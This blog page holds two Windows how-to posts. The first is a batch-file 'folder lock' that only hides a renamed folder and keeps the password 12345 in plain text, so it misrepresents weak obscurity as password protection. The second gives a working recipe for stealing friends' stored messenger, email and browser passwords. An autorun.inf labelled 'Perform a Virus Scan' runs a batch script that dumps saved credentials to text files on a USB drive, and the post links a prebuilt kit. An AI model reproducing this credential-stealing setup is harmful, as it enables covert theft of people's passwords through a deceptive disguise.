Showing posts with label Password. Show all posts
Showing posts with label Password. Show all posts

Monday, 11 February 2013

Folder lock with password & hide without any software


In my previous post I have discussed about how to hide folder name & icon without any software. Today I shall tell you how to lock a folder with password without any software. Only you need to create a batch file. So follow the steps.

  • Open a Notepad. Copy the code below and paste it into notepad.
  • Save as the notepad as NAME.bat (E.g. Folder_lock.bat).
  • Keep the batch file (Folder_lock.bat) in any hard drive or on the desktop and double click on it. It will create a new folder locker at the same location.
  • Keep the files that you want to hide and also lock with password into the folderlocker. If you want to unlock your files then double click on the batch file again and type Y (for yes). Here I set the password 12345. You can change the password by editing the batch file.
Here the batch file code :

    cls
    @ECHO OFF
    title Folder LockerByPrabirGhoshIndia
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" gotoUNLOCK
    if NOT EXIST Locker goto MDLOCKER
    :CONFIRM
    echo Are you sure u want to Lock the folder(Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock folder
    set/p "pass=>"
    if NOT %pass%==12345 goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDLOCKER
    md Locker
    echo Locker created successfully
    goto End
    :End

    Hacking of Password by USB Flash Drive

    Today I shall discuss that how you can hack MSN, Yahoo Messenger, Google Talk, AOL, Digsby, MySpace IM, GAIM etc. password of your friends from their computer using USB flash drive.

    Some password recovery tools are present like Mail passview, MessenPass, Protected Passview, PasswordFox, IE Passview etc. These tools reveal the passwords stored by Web browsers, instant messenger applications.
    • After downloading all tools, extract them and copy the .exe file into your USB flash drive. (i.e. Copy only : mailpv.exe, mspass.exe, pspv.exe, passwordfox.exe and iepv.exe into your USB Pen-drive )
    • After that Create a new Notepad. Then Copy the following text and paste it into notepad and save as autorun.inf (note : this is not a virus.)
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
     
    • Then Copy the autorun.inf file into your USB flash drive.
    • After copying the following text paste it into another new Notepad. Now Save the notepad as launch.bat and copy this launch.bat file into your USB flash drive.
    start mailpv.exe /stext mailpv.txt
    start mspass.exe /stext mspass.txt
    start passwordfox.exe /stext passwordfox.txt
    start pspv.exe /stext pspv.txt
    start iepv.exe /stext iepv.txt


    Now USB flash drive is ready to sniff the passwords. When you insert the USB flash drive the autorun window will pop-up and select the first option (i.e. Perform a Virus Scan). It will take a few seconds to process the all steps and stored the passwords in the .txt files.

    I have made one for you. Just download the .rar file, extract it and copy to USB flash drive.
    Password hacking software : Download
    Password for download is : pswhk001et (To see password just select the line)
    Related Posts Plugin for WordPress, Blogger...